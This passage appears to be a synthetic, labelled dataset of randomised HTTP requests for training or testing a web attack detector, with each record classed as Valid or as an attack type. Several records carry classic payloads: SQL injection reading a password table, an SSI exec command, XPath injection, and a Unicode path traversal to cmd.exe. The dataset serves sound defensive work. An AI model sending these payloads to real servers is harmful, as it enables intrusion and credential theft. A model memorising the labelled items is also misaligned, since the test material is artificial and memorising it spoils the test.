Trailer: Pragma
User-Agent: nstCtsu0eewdrs
UA-CPU: StrongARM
UA-Disp: 560,8343,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0653x3308
Via: 8.0 www.faTaaI.js:9, 3.4 242.238.40.135, ilHd/2.7 133.227.163.198
Transfer-Encoding: identity
Upgrade: rz2/0.2, imn/2.2, v538eq/0.4
Warning: 318 www.g7bg.png "aa37meuh" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6psh=slrjySeihHhsee&gmro4ehhs8s0Nt=iY4pEMcV&AsEnpiItIyegtv8=c.66zVxKnw&ri3ihs=129866&zyc=oeN:u7Nnedelete&HHOmmbhomeY=uxtmpc

End - Id: 39107
Start - Id: 9932
class: Valid
GET /oCiviT29A/maqOm9_N7Pb/R5I/5Wyt/8Hg.T/oQKAZyMH_/tIer56umRnmIewcthieA/nKmiU4G_48tV/titlt.mdb?uiGaake=64&ea=50&snrtel1tsene=asaef&6y6cdlsh=e&syrppgftTmt7s=cyEi&neeel=Ew%2Brkr+h8&efonkNohtsidcu=e+mform%5Crmdo+access_logi%7Ct%24liken&dee=tD%40A%28ntsvarthufromftp5%3F%3Af&fnwDmS=ee&4rlneauod=hjes%28h&ozerqmrlrneu=m%3Fr&RujpiiStaenjt=rfd4tdzalhd&wi3naeegb=itIeerEy0deam&ei7meiaekr=wcwes HTTP/1.1
Host: www.e1ea.st
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250;q=0.3, x-mac-icelandic;q=0.8
Accept-Encoding: deflate, compress;q=0.3, compress, gzip, identity
Accept-Language: rxcrRcgs-gs;q=0.9, d-urwuhxog;q=0.2
Cache-Control: max-stale=12175
Client-ip: 223.28.120.2
Cookie: eo=hytuqpbeen7a;b3DnqsobjectE=teobo agroup by|slr6;xmlDX0dWj1=13;msung=$ud GgodwOftcynnve3;ij6a0=sPm;mw=zs\en'eOnull[vbscripterL;
Cookie2: $Version="052"
Date: Sat, 08 Apr 06 19:39:52 UTC
ETag: W/"VaeJTs-1Felkis9K4d"
Expect: m8dkgye
From: hoyaen@w8anmIEhtt.org
If-Modified-Since: Tue, 11 Nov 08 15:46:44 UTC
If-Unmodified-Since: Tue, 27 Mar 07 04:48:10 UTC
If-Match: "q7Ru@ZGoPe_YlNBq"
If-None-Match: "V7F7DMi4XjMGXGU_"
If-Range: "JBHvoS-sOVQRDLOZDsXB"
Max-Forwards: 297
MIME-Version: 6.9
Pragma: ttr=umnqdtof
Proxy-Authorization: Digest realm
Authorization: henns trfC=eMdt5wn
Range: -073,-7284,0-
Referer: http://www.tCitopo.de/shra/ewioo/lhaE.asmx
TE: trailers,chunked;q=0.5,deflate
Trailer: Range
User-Agent: Mozilla/8.9 (Windows; U; WinNT 6.6; cn-2o; rv:2.4.0) Gecko/16203423
UA-CPU: x86
UA-Disp: 042,750,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9878x2759
Via: 4wuauq/2.3 76.58.5.224:3678
Transfer-Encoding: compress
Upgrade: auldc/3.6, reoo/4.9
Warning: 097 www.eslmAdc.js "1aItavs" 
X-Forwarded-For: 133.212.108.145
X-Serial-Number: 443764018144231043
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 9932
Start - Id: 3322
class: Valid
GET /niPWcj.emu/pSKOOE_cA0XQCK27lXS-/aQmtp/theqi4osgcmEte/oFQhcL9YJC-8r2X/9sohvscyt/sVfpQdnI.YIOq/ieodhenlftrao/2Scz_QD8J/dPVkhaJdEuUs.png?doosnwa=2475&eghiileoa=08&erti4=7&br=1it&mtguft=5751&uecwA=eylinpute&IW5ohj=4179308 HTTP/1.0
Host: 120.180.159.31
Connection: close
Accept: image/gif;q=0.7, audio/x-wav;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ejtnr8-Ei, rg-t8ogE;q=0.6
Cache-Control: only-if-cached
Client-ip: 64.110.122.85
Cookie: xgifoeonyr=9779378;LsystemunGsKf7T=71705936
Cookie2: $Version="250"
Date: Thu, 11 May 06 04:36:01 GMT
ETag: "PCy.cZ17f2C_-noJ-rfq"
Expect: wd2e
From: ooze@mtz9qt.fr
If-Modified-Since: Thu, 12 Apr 07 21:27:26 CET
If-Unmodified-Since: Sat, 31 Dec 05 19:36:35 GMT
If-Match: "Rew7iyDnQaOo1WM9P"
If-None-Match: *
If-Range: Sat, 20 Oct 07 01:48:59 UTC
Max-Forwards: 09
MIME-Version: 4.9
Pragma: oaeeyalU=hvaEiehr
Proxy-Authorization: il3tu1 yhotudi=ettauin
Authorization: Basic YnRkeWFhRTpBZXRuYW8=
Range: 715429-,64862-,731-870612
Referer: /paaiT.sh
TE: deflate;q=0.1,trailers,deflate
Trailer: Expect
User-Agent: Mozilla/7.4 (compatible; lssdsety; Win98; oti7at; ofxpcn4tt; e1mnil)
UA-CPU: MIPS
UA-Disp: 2815,9400,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 701x9468
Via: 7.1 www.ibauqss.js, HTTP/0.2 28.234.140.112
Transfer-Encoding: gzip
Upgrade: e7H/3.8
Warning: 102 www.eipsn.js "e5Ie" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 1661019854
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3322
Start - Id: 48681
class: XPathInjection
POST /tfiDn-IA@5u.fH0ka.shtml? HTTP/1.1
Content-Length: 374
Content-Language: ltusla,oehrUn,r9hhoyrl
Content-Encoding: identity
Content-Location: /t3An.mpg
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Host: www.sLed.ch
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258, windows-1252, euc-tw;q=0.2, koi8-r;q=0.9, windows-1253;q=0.9
Accept-Encoding: 
Accept-Language: aao-sNp, A-gitwy;q=0.6, oVd-invcoay;q=0.6, ct1-aEru7t
Cookie: N2a=959;tieNrlk=4
Date: Sun, 09 Apr 06 21:44:11 GMT
If-Unmodified-Since: Sat, 28 Apr 07 21:56:41 UTC
Max-Forwards: 67
Referer: http://www.helm5s.be/eoed.jpg
User-Agent: nJOexasl/3.8.2
Transfer-Encoding: deflate

i1EozmubahE=tAJra4Hk67Z&hhactd2znOoebmn=57563 or  nbfnm/ct/ee5o/child::node()[position()=3] or  45=&ihoopnh=66130&esltal7=l&naVetsbXWuiI1sn=etet&PyoAtareelne5k=eilaTdw&MghitqTn=1&qaidfreufmtcin=rEyceeNoyexyu&access_logtLS=73824&6HDxA=423193&ilceream=anr&tmHoevhGatBtnlg=3a&nullG.B-UR-kN=75008595&.CaevalPyOkta=ll5EwdYRiwoz&eS5DhgAyispodv=lhi4$y3O

End - Id: 48681
Start - Id: 39931
class: SSI
POST /tKH/GcbetweenSformAw1Giprocessing-instruction/05b/ilm7idbiee1e/D.bqorservices5/eeele/imcBs9Fb5GVc/a8pTYe9K7_OX/69hjesttmmceyes/k_WJ83u/DvwidNpasswdiYmUVHnph-/mailzDosu5Q.dll? HTTP/1.1
Content-Length: 85
Content-Language: sbromf,veftwf,reWd8i
Content-Encoding: identity
Content-Location: http://clauo6.it/EtNesH/trtcat/uepIhLor.ace
Content-MD5: dHNpZXJVdHNvdWV2YWxzTg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Aug 08 14:32:04 GMT
Last-Modified: Fri, 04 May 07 11:04:42 UTC
Host: 222.253.104.119
Connection: keep-alive
Accept: text/xml;q=0.7, text/plain;q=0.4, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: min-fresh=09
Client-ip: 241.54.246.2
Cookie: .H_0Kwindow.openIT=251;hM2ireeebe=t+v/nsT(bdivlehnS6;ahnwceoEpctoiy=oxVrX;documentqkrE_3HAU=te ymhavingdr
Cookie2: $Version="9"
Date: Fri, 20 Oct 06 14:18:15 UTC
ETag: "904lqZNeUrGwrPUmWLi1"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Wed, 16 Jun 04 07:25:43 GMT
If-Unmodified-Since: Wed, 18 Jan 06 04:00:11 UTC
If-Match: "I.3l53sXRzFW7pUa1G5"
If-None-Match: "G_YHPIWr5Epa5_ua"
If-Range: "MIApyNYKDy81AJ4Ryyd7"
Max-Forwards: 39
MIME-Version: 6.0
Pragma: eyn2tl=de
Proxy-Authorization: prpre Olaoher9=mhser4gE
Authorization: NTLM ZndpZTlzbmVzZDRlOXFiQWFpb2ZldEVqZWcxdXJsZWVmYXFobmg=
Range: 065804-4,-22740,4181-
Referer: http://www.zvt9t.it/iRyleV.pl
TE: trailers,gzip,chunked
Trailer: User-Agent
User-Agent: lhnirbafeedoRs6fa
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: 3.2 40.239.123.253
Transfer-Encoding: hsehAt
Upgrade: awoh/8.2
Warning: 800 145.154.254.159 "waio" "Sat, 03 Feb 07 02:53:35 CET"
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ratolhyd=6&Zrk=<!    #<!--     #exec   cmd="id"-->&9.Seu7I-=24437

End - Id: 39931
Start - Id: 10314
class: Valid
GET /locationinputMS3mYk6w/yunelopayoddatLius/rbvEMxjE/iIdq-f/4CP-/phpg89GQ4H/em/WR/erbioocelHhgioe/hxO.htm?tkztppxsteamy=cm_&nernWshZe4vwbOe=0&AKvcfSa=boqea&szfeseBs9a=wtrY0sAmt&nsp25=ann&odbT=tez&heclendJt=a3Lkihnc0e93m&Phoidlri=rxRr&OaattnT=4&clei3n=16361 HTTP/1.1
Host: 183.118.224.202:9962
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp, iso-8859-5
Accept-Encoding: gzip, identity;q=0.9, gzip, identity;q=0.5, identity
Accept-Language: bailhlo-Si84e, B4zH-etny
Cache-Control: max-age=966
Client-ip: 42.80.49.249
Cookie: iedtAamhectrho=dyfE5;ZBFQ3tEc8Os_=h6reWeWr;soekRs=ewkaiemnohRebiWi;1sneocechneo=group bytperlsizbe
Cookie2: $Version="56"
Date: Thu, 19 Nov 09 22:07:28 GMT
ETag: W/"EYezGROZhzumkOacy"
Expect: lteer=lefnar0
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Sat, 30 Jul 05 10:53:09 CET
If-Unmodified-Since: Sun, 30 Mar 08 05:08:08 GMT
If-Match: "Jad_RqPoY_tnC5ri"
If-None-Match: ".6StaZKcM4H6ZWJ"
If-Range: *
Max-Forwards: 71
MIME-Version: 3.2
Pragma: e='e'
Proxy-Authorization: Digest nc=b1E6547b
Authorization: hrnl hez2f=hir5o54
Range: 632334-29563,0-36
Referer: /ff5dar/tiONi/daewnu/rrfw9nM.nsf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.9 (compatible; MSIE 3.8; Mac OS X; t4oreIler; 1ncjlmnKd)
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 032x7737
Via: 7.7 www.eooni.html, HTTP/7.7 www.Aitmsdu.shtml, HTTP/4.6 www.kn80utc0.tiff
Transfer-Encoding: deflate
Upgrade: pnge/0.2
Warning: 001 46.121.83.218 "tricosdEe6Osh" 
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10314
Start - Id: 170
class: Valid
GET /tXHou9o9/rrEDOkF/cp7Lh5D-J0yS7lC@l8/oaP/7sMY.mdb?KpiGvtMg-RUz=o2t2&VgJQ=httpsy4m&Xyu8izFBA@=mtoopiatc&Z4UX=eu0l&Ia=590925&rkvzHn9rs=di%28p&EZa4k=mrmNTiel&iq5Uinsert=ttTeWPnelv&dso7s0ititlrgn=+hhE1ytar3nph-&jbetween5G7A=%24a+tE&AoajgL6He5toD=ninp%28stiewp-&seaCue=access_logEnrt%27w%3D+%28a%3Cahy HTTP/1.1
Host: www.2ydrios.gov
Connection: close
Accept: audio/basic;q=0.0, image/gif, audio/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: tt-im8, lv-l;q=0.3, m-wikytndr, Nteel-nOd;q=0.4
Cache-Control: no-transform
Client-ip: 49.228.57.192
Cookie: th=5uacopy5hlTaioj
Cookie2: $Version="125"
Date: Sun, 30 Apr 06 18:11:13 GMT
ETag: "f61ret1R3hv18txQ0Z"
Expect: onwo8=ittano
From: ilna2r@Raixrttrhe.st
If-Modified-Since: Tue, 31 Aug 04 10:40:41 GMT
If-Unmodified-Since: Fri, 03 Dec 04 23:22:51 CET
If-Match: "6wn_NCb_eV3ajzjty3zn"
If-None-Match: "nliIsR7PHWH.cQCjz"
If-Range: Sat, 04 Feb 06 22:49:28 GMT
Max-Forwards: 2722
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: veEqi eioatnQ=eafazya
Range: -63
Referer: http://rrsz4hio.net/rmEPesat/amosm/baet/ptnatk.js
TE: trailers,deflate;q=0.0,trailers
Trailer: Transfer-Encoding
User-Agent: r8sOogUtlhcdeo4
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7281x9184
Via: 8.2 242.210.5.149, sNuS2/5.0 www.aAddt4n.js
Transfer-Encoding: identity
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 367 www.lqnT2.htm "rqtcera" 
X-Forwarded-For: 7.28.176.57
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 170
Start - Id: 43714
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 255.129.159.148
Connection: keep-alive
Accept: audio/*;q=0.8, text/html
Accept-Charset: *
Accept-Encoding: gzip, compress, compress, gzip, compress
Accept-Language: sm-f;q=0.6, o1-ieaap;q=0.5, nooaE-eet;q=0.8, ecrud-6, hu-1icRaeS
Cache-Control: no-transform
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Tue, 14 Sep 04 23:09:05 UTC
ETag: W/"pzeg7NnTojdmoLxmh"
Expect: aarl
From: uhbqiisi@rmieagr.org
If-Modified-Since: Fri, 15 Feb 08 22:11:35 GMT
If-Unmodified-Since: Mon, 15 Aug 05 11:46:01 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Feb 08 23:35:21 GMT
Max-Forwards: 064
MIME-Version: 8.9
Pragma: ePei5c=odw
Proxy-Authorization: Basic c2VhaW46Ykh0U3A=
Authorization: Digest nonce
Range: 7008-71
Referer: http://ey4e3ri.gov/leh1a/rahmt/urm2rONd/caxr/yz5natc.wav
TE: gzip,deflate
User-Agent: rsJZ@2QJm http://www.asahi1s.gov
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5641x613
Via: 6.5 232.80.54.80, 4.3 www.todEeree.png
Transfer-Encoding: mnnhta
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 342 www.haYt.jpeg "eunI" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 181822248668347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43714
Start - Id: 9187
class: Valid
GET /ewXs/j2eanusizogenlmci/Y1ZEA1P.shtml?ptnr2edTreache=957128&WaL=s5m6ht&sprne=i4insert%25jpsyeidnOlfinputae6u&enaheziI3n=nBlJr5Vnq&geolaroThstl=vuyxp_&nQy-bAn=32340&1dofMOsn7vs=tb-nsjud&ane1gae4oloaer=71973152&neiifehu=me%3A%3Au%26gqca&qeepg=aeaEmXVK0&ee=earHlrwssafAoetuo HTTP/1.1
Host: www.asa6lstR.biz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: hhaniaue-ot;q=0.4, peSt-9gnbosnh;q=0.9, 0U-ooitega, h-ceti;q=0.1
Cache-Control: no-store
Client-ip: 77.58.247.61
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="958"
Date: Fri, 10 Nov 06 18:35:05 GMT
ETag: "MpU6cr5hO77EN__ij@0y"
Expect: 100-continue
From: egrds@churmi.org
If-Modified-Since: Thu, 30 Jul 09 10:08:05 GMT
If-Unmodified-Since: Sun, 04 Jan 09 24:10:05 UTC
If-Match: "RVWY.qat4j2hXqWBU"
If-None-Match: "Hy5P5Bi6nfbLZRmbb"
If-Range: Thu, 13 Jan 05 01:03:57 GMT
Max-Forwards: 91
MIME-Version: 8.7
Pragma: zarsirr=taNws
Proxy-Authorization: NTLM bmRlZ3JoZmEzbmlQZ29kSWJOb25ydDFvb1VubjZlOHJk
Authorization: Digest username="seSm"
Range: 57164-,9027-962000
Referer: http://edJt.be/eemtL/h5ntenqa/raire8r.php4
TE: trailers
Trailer: Range
User-Agent: E6tew/4.3
UA-CPU: StrongARM
UA-Disp: 5248,9403,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3033x117
Via: gij/2.9 14.85.40.200, 7.3 www.oMf8.htm, aecrge/7.8 180.184.231.75:45
Transfer-Encoding: compress
Upgrade: a7ng1h/4.9, wds/9.4, ieM/3.0
Warning: 029 www.rgnrlhe.js "hetef0djrse" "Sun, 29 Aug 04 17:38:57 GMT"
X-Forwarded-For: 252.67.93.211
X-Serial-Number: 51512121332021601
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9187
Start - Id: 35276
class: SqlInjection
GET /fTSf-/sul/deow7/7./XThttpsC@WlinkMMN/iteurmyqe/lBz5ORlg4BgQ60K/ndtsaT.cfm?7bLteIsykfzewot=snv%7Cott%7Ed%25i8&eae7tm=9795005&alIWjnwindow.openQ=uffrahcmntfeu3hseo&eInhhtebcipo=hlr&Nedc9iayh=mwlorobject3koi%28enh+%40&XtDvK=shtad&owinOfoHlclb9hm=asdnHmha&sbihnadndhrI7=%27union++select+PASSWORD++from++DBA_PASSWORD%3B--&w@lDBNBaHLO=s4Viqr2&fMantIr=5llddIeYwo&jE6utpaYenet=7615&uom=%3C%2F%26i%3AD%3Ba%28eOdra HTTP/1.0
Host: www.feLu.com
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 155.132.155.102
Cookie: dteduioI=06706;rghynorist8=21744;stiur8s=bn3H
Cookie2: $Version="75"
Date: Wed, 04 Feb 09 02:29:48 CET
ETag: W/"K-NkvRrlLf6gBjMEc3V"
Expect: 100-continue
From: B9ir@tOlwn.gov
If-Modified-Since: Sun, 23 Oct 05 10:13:04 CET
If-Unmodified-Since: Tue, 29 Mar 05 24:18:40 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 03 May 09 14:11:35 CET
Max-Forwards: 6
MIME-Version: 8.3
Pragma: ajr='elrosis7'
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: http://bmY7deu.org/oirt0r6f/aa99et/tastcers/Ilgf8te5.nsf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 8.0; c3-ed; rv:9.8.4) Gecko/26492493
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: FTP/7.5 www.ac1art.jpeg, FTP/4.7 www.rancoo.shtml
Transfer-Encoding: identity
Upgrade: caha/7.7
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 35276
Start - Id: 34178
class: Valid
POST /5gN2P@PzVBs/kE7vwp-l/6vPESXrEg/YIg5EMlcopyCyo/AXV/djQ_h@v2n/atodla3.png? HTTP/1.0
Content-Length: 66
Content-Language: ytztaose,dmh
Content-Encoding: identity
Content-Location: /pttdrtC/Toio.css
Content-MD5: d2FpaXR3U2Fnb3dhb29sbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Jan 05 05:31:47 CET
Last-Modified: Fri, 19 Aug 05 06:10:36 UTC
Host: 27.119.164.74:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: koi8, x-mac-ce, iso-8859-8, gb2312;q=0.4
Accept-Encoding: 
Accept-Language: raiist-e8e, esneaxea-oheie9Ac;q=0.0, nac-aentDi
Cache-Control: c=xaj2uaot
Client-ip: 4.16.19.48
Cookie: aOertiAapULe=sVp2IWVsXm;YQLXU2ym=eyy7t6e;rim3ne7=synta stdinob|tsCp /;rcpechoL45L0=sooyi;GI9ito=80
Cookie2: $Version="9"
Date: Mon, 08 Aug 05 03:53:27 UTC
ETag: W/"pqMamA4R6r0UMCg.mI6n"
Expect: NihtsiBh=endls;adlasso=ikse4eo
From: nttld@dermemt1.biz
If-Modified-Since: Sat, 09 Jan 10 22:21:54 CET
If-Unmodified-Since: Wed, 27 Dec 06 13:11:25 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 22 May 07 02:07:23 GMT
Max-Forwards: 07
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="pcny3"
Authorization: eer8 naa9e=ueaidbt
Range: -23,3-
Referer: http://www.rrqei9oC.st/sdyobht/Yrits/axgsbsEr.conf
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/0.1 (X11; U; Linux i586 5.4; tS-fs; rv:0.2.2) Gecko/67676287
UA-CPU: MIPS
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2584x7510
Via: FTP/5.1 153.241.142.101
Transfer-Encoding: identity
Upgrade: ciwqt/3.9, Ltten/0.9
Warning: 172 www.tc2tnn.css:9 "L0ecfs57hjlqyToe" "Fri, 10 Apr 09 08:29:28 CET"
X-Forwarded-For: 234.13.70.211
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4oqEebHpAli=k04u&emN=bruehdscriptabgsoundoo&tuouRrvOt=tahttpsn)j

End - Id: 34178
Start - Id: 33959
class: Valid
PUT /txxW5Lpoyif@yV9Vk/EaHtrmhiir4ef.html? HTTP/1.0
Content-Length: 154
Content-Language: 3ej1,Ini,tWnhp
Content-Encoding: identity
Content-Location: http://www.fenso.uk/oiiBnw/apea/idb0/b15s9l7.tiff
Content-MD5: ZFNhaHRhY3dtb25yYW1udQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Jan 06 23:47:44 UTC
Last-Modified: Mon, 23 Oct 06 11:49:37 CET
Host: 230.115.119.50
Connection: close
Accept: audio/basic;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, compress
Accept-Language: *;q=0.1
Cache-Control: treaeaaa=ampera
Client-ip: 231.32.90.245
Cookie: wa8edacoraj1=495521829;pfhaolbnwbtp=thbpccndsatr;hj=eMEgt;whetnteatSiar=8
Cookie2: $Version="333"
Date: Fri, 11 Aug 06 01:23:27 UTC
ETag: "SWwCBEavj0BTZPAZJ"
Expect: lnt19er6=elsin
From: aNdnhYs5@1KPmv1.it
If-Modified-Since: Mon, 12 Dec 05 07:43:12 CET
If-Unmodified-Since: Sun, 27 May 07 01:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 16 Aug 05 05:47:31 GMT
Max-Forwards: 7138
MIME-Version: 5.5
Pragma: i=ncr1qb
Proxy-Authorization: Basic YXRlczo4YmN0ZWVhYQ==
Authorization: svtdr eeOqesz=tkae2f
Range: 50468-961,8583-3
Referer: /zrii.rar
TE: chunked;q=0.1,chunked
Trailer: Via
User-Agent: Mozilla/3.1 (X11; U; SunOS sun4u 8.7; os-Tp; rv:5.5.1) Gecko/25988806
UA-CPU: x86
UA-Disp: 225,357,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 236x087
Via: HTTP/7.2 www.eooqi7vl.css
Transfer-Encoding: compress
Upgrade: qieelu/3.4, EqncM/6.9, btrA/6.0, idP/4.3, Owse/7.1
Warning: 808 www.a11otqpd.js "ieErLxrlK" "Tue, 21 Oct 08 21:39:20 CET"
X-Forwarded-For: 151.46.94.105
X-Serial-Number: 33226
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

K9Rmmqzz=9 &-ZHXC6-XupdatetmpQ=05742122&orLunofqTgoed=8856&hrU5o6tmoVDt=41&eohzi5ergsNssee=rlEnBe5i&ef=iy&TXJVx-=3var&ta&esotdiqicn=b8ctfrwel3tdiCtp~E

End - Id: 33959
Start - Id: 34149
class: Valid
PUT /siJ0/EwsoeeyeKLekEuj/lskG8acceptjSsamff1cWI/ihu4vxTq7DzOZkU.bin? HTTP/1.1
Content-Length: 285
Content-Language: 2yrcay
Content-Encoding: deflate
Content-Location: http://eoiase.it/i0ta2ts/rasd/oelm8mo/gnshihc.zip
Content-MD5: NHRlU29qaGVlYWU5ZWlpeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Jun 09 11:37:44 CET
Last-Modified: Sun, 20 Aug 06 23:06:14 GMT
Host: www.5glHueSdd.ch
Connection: ikapm
Accept: video/*;q=0.3, image/gif;q=0.4, audio/*;q=0.2
Accept-Charset: iso-8859-2;q=0.4, iso-10646-ucs-2, us-ascii, iso-8859-5, euc-cn
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=04
Client-ip: 105.40.117.107
Cookie: he=vl9eru9rpatSpnTlF
Cookie2: $Version="339"
Date: Thu, 11 Oct 07 12:41:02 CET
ETag: "KEI.oj4E9Hw.Jzu"
Expect: 100-continue
From: elh3tsco@Oytt10o9e.org
If-Modified-Since: Tue, 22 Dec 09 18:33:59 CET
If-Unmodified-Since: Sun, 18 Mar 07 09:49:30 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 30 Oct 08 08:06:29 GMT
Max-Forwards: 521
MIME-Version: 9.1
Pragma: tEnarimu='rsaiy4m'
Proxy-Authorization: Digest cnonce="ri3ml"
Authorization: Basic c09sMHJhaTphZWZlamU=
Range: -85
Referer: /XNWt/rzhAtLt/iqaatt.sh
TE: chunked;q=0.8,gzip;q=0.3,trailers
Trailer: Connection
User-Agent: Mozilla/2.3 (compatible; Konqueror/8.2; Windows NT; hmhjttns; atsnaa)
UA-CPU: x86
UA-Disp: 654,4575,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 995x590
Via: s9Opi/3.0 28.29.83.134:585, 0.0 www.dalfIrvx.html, oiiuh/8.9 www.tzd7hr.jpeg:81
Transfer-Encoding: bsktot; htve9uo=naht
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 306 75.33.43.3 "apg0" "Sun, 22 Jul 07 01:14:23 UTC"
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 18830507621799
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

sinoels=elu&QtsCC=iNa cbatw&hfYrine=p6tg&oQKW2uYQm=cRtFIW&wc0ec=x 7&ciOomnenAern=uraeahy4rszswdug&ek9iSeCt=oa%nexecwp- 3t&7JXxEIbodywwOxM=b5zyVieEOO&H.iHCpconnectH=fcye'2rhn&Ttosteaeelfa='tconnect&pfi=awV1M40RQq&e9Y7dROeaes=xe&jtAtieyosado2=06&vaywfnsacigaS=7&fan=oconnectdcuowao

End - Id: 34149
Start - Id: 34076
class: Valid
POST /ostice0nr/nXp0xVDfeR2/rdsheihz2lon0wlaenht.aspx? HTTP/1.0
Content-Length: 208
Content-Language: b3ertlm
Content-Encoding: deflate
Content-Location: /ciiEngo/ofztit.sh
Content-MD5: ZGlyaXdyYnRzZTdvam03Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Jun 04 20:27:54 UTC
Last-Modified: Thu, 01 Dec 05 08:44:04 UTC
Host: www.az4nUtxw.org
Connection: keep-alive
Accept: image/*
Accept-Charset: x-mac-turkish, iso-2022-jp;q=0.8, utf-8, x-mac-cyrillic, iso-2022-kr
Accept-Encoding: gzip, compress, compress, identity;q=0.8, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 235.58.19.11
Cookie: aiIiea2drsee=~xhsc;wtI=mtzEPbveTe;Igrs=bhee2IOedjsEUnea;uglm4=zani;rtenu=4ed
Cookie2: $Version="88"
Date: Wed, 16 Mar 05 07:21:10 GMT
ETag: "BFICHBmFbZh3dSSHxy"
Expect: hSpecm
From: ljpt@cbCjoeo.org
If-Modified-Since: Sat, 09 Jul 05 04:38:03 GMT
If-Unmodified-Since: Tue, 16 Oct 07 14:01:48 CET
If-Match: "XOLXyt5ELo.Wx2K5"
If-None-Match: "KJdBL.EeTGaHHDVycrS"
If-Range: Sat, 04 Apr 09 21:50:22 CET
Max-Forwards: 4790
MIME-Version: 3.9
Pragma: yb='ite2il'
Proxy-Authorization: noe8lh ucee=Ansbi
Authorization: Basic b0ROZ3FhbTpka3RvWWU1
Range: 80-
Referer: /l00nn/hkDmm/uneoiJ3n/niptn.jpg
TE: gzip;q=0.1,gzip;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: enottdzngp
